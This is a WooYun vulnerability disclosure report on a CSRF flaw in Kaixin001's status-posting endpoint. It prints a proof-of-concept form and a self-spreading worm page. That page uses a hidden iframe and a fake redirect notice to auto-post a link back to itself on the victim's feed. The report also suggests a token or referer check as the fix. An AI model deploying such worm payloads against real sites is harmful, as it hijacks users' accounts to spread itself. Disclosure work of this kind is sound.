当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037240

漏洞标题:开心网某处功能CSRF可构造蠕虫

相关厂商:kaixin001.com

漏洞作者: yingle

提交时间:2013-09-16 15:56

修复时间:2013-09-21 15:56

公开时间:2013-09-21 15:56

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-16: 细节已通知厂商并且等待厂商处理中
2013-09-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

开心网 蠕得真开心

详细说明:

问题应用:
http://www.kaixin001.com/home/

1.png


抓到发表的POST地址:(http://www.kaixin001.com/records/ajax/submit.php)
exploit如下:

<form action="http://www.kaixin001.com/records/ajax/submit.php" method="post" >
<input type="hidden" name="customname" value="test">
<input type="hidden" name="my_text" value="test">
<input type="hidden" name="save_to_album" value="1">
<input type="hidden" name="sync_status" value="2">
<input type="hidden" name="save_spri" value="0">
<input type="hidden" name="spri" value="0">
<input type="submit" value="ok">
</form>


构造一个payload:(http://cnhk.ml/kaixin/send.html)

<meta http-equiv="content-type" content="text/html;charset=utf-8">
<h1>
正在跳转...
</h1>
<iframe id="test_iframe" style='display:none'>
</iframe>
<script>
function CSRF() {
test_iframe.document.write("<form id='test_form' action='http://www.kaixin001.com/records/ajax/submit.php'method='post'><input type='hidden'name='customname'value='test'><input type='hidden'name='my_text'value='推荐大家一个好玩的: http://cnhk.ml/kaixin/send.html'><input type='hidden'name='save_to_album'value='1'><input type='hidden'name='sync_status'value='2'><input type='hidden'name='save_spri'value='0'><input type='hidden'name='spri'value='0'></form><script>document.getElementById('test_form').submit();<\/script>")
}
CSRF();
window.setTimeout("window.location.href='http://threejs.org/'", 8000)
</script>

漏洞证明:

当用户访问之后:

2.png

修复方案:

来个token,或者限制来源

版权声明:转载请注明来源 yingle@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-09-21 15:56

厂商回复:

最新状态:

暂无


漏洞评价:

评论